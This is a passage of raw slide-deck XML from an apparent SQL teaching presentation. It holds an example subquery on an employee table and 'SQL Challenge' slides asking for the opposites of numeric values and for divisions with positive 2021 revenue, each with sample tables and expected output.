              <a:t>select ename,job from emp where deptno=(select deptno from emp where ename like '%jones%') and ename &lt;&gt; 'jones';</a:t>
            </a:r>
            <a:endParaRPr sz="2395">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3195" name="Google Shape;3195;p517"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10751" l="0" r="10209" t="54284"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="205950" y="2341124"/>
            <a:ext cx="8732102" cy="1912575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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9" name="Shape 3199"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3200" name="Google Shape;3200;p518"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265275" y="132075"/>
            <a:ext cx="8520600" cy="993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2355">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>SQL Challenge</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2355">
              <a:solidFill>
                <a:srgbClr val="DC143C"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2355">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Select each number as its opposite</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3201" name="Google Shape;3201;p518"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="311700" y="1493738"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{4096D094-DB0B-4A9D-8F5E-8AE1A14F7588}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="537525"/>
                <a:gridCol w="1483775"/>
              </a:tblGrid>
              <a:tr h="618425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2400">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>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2400">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Value</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2400">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>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523000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</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-56</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523000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</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76</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523000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3</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-84</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523000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>4</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96</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523000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>5</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-47</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3202" name="Google Shape;3202;p518"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5801875" y="1542375"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{4096D094-DB0B-4A9D-8F5E-8AE1A14F7588}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="818950"/>
                <a:gridCol w="2165050"/>
              </a:tblGrid>
              <a:tr h="964300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2400">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>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2400">
                          <a:solidFill>
                            <a:schemeClr val="accent3"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OppositValue</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2400">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>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463875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</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56</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463875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</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-76</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463875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3</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84</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463875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>4</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-96</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463875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>5</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47</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3203" name="Google Shape;3203;p518"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569950" y="1069775"/>
            <a:ext cx="13461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value_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3204" name="Google Shape;3204;p518"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6717329" y="1069775"/>
            <a:ext cx="17463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Final Output</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3205" name="Google Shape;3205;p518"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2628475" y="1468975"/>
            <a:ext cx="3173400" cy="33534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3000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="10162F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The challenge is to write a SQL query for this table that’ll return all the opposites of the values in the Value column. If a number is negative, make it positive and vice versa. Here’s what your query should return:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="10162F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="10162F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>56, -76, 84, -96, 47</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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9" name="Shape 3209"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3210" name="Google Shape;3210;p519"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373850" y="159900"/>
            <a:ext cx="8520600" cy="702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90"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2260">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Challenge</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2260">
              <a:solidFill>
                <a:srgbClr val="DC143C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2260">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select all the divisions that have had revenue this year</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2260">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3211" name="Google Shape;3211;p519"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439275" y="1069775"/>
            <a:ext cx="13461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my</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3212" name="Google Shape;3212;p519"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6793529" y="1069775"/>
            <a:ext cx="17463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Final Output</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3213" name="Google Shape;3213;p519"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="161000" y="1437425"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{4096D094-DB0B-4A9D-8F5E-8AE1A14F7588}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="971550"/>
                <a:gridCol w="495300"/>
                <a:gridCol w="914400"/>
              </a:tblGrid>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Division id</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="73025" marL="730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Year</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="73025" marL="730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Revenue</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="73025" marL="730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1</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2018</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60</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1</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2021</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40</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1</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2020</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70</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2021</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-10</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3</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2018</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20</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3</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2016</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40</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4</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2021</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50</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3214" name="Google Shape;3214;p519"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6513200" y="1550775"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{4096D094-DB0B-4A9D-8F5E-8AE1A14F7588}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="971550"/>
                <a:gridCol w="495300"/>
                <a:gridCol w="914400"/>
              </a:tblGrid>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Division id</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="73025" marL="730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Year</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="73025" marL="730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Revenue</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="73025" marL="730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1</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2018</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60</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4</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2021</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50</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3215" name="Google Shape;3215;p519"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2628475" y="1468975"/>
            <a:ext cx="3630300" cy="3353400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="10162F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Your task is to write a query for this table that’ll return just the division ids for all the divisions that had positive revenue in 2021. Your query should return the following values:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="10162F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="10162F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>1, 4</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="10162F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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520"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373850" y="303025"/>
            <a:ext cx="8520600" cy="635100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Challenge</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="DC143C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2727">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Get the total salary</a:t>
            </a:r>
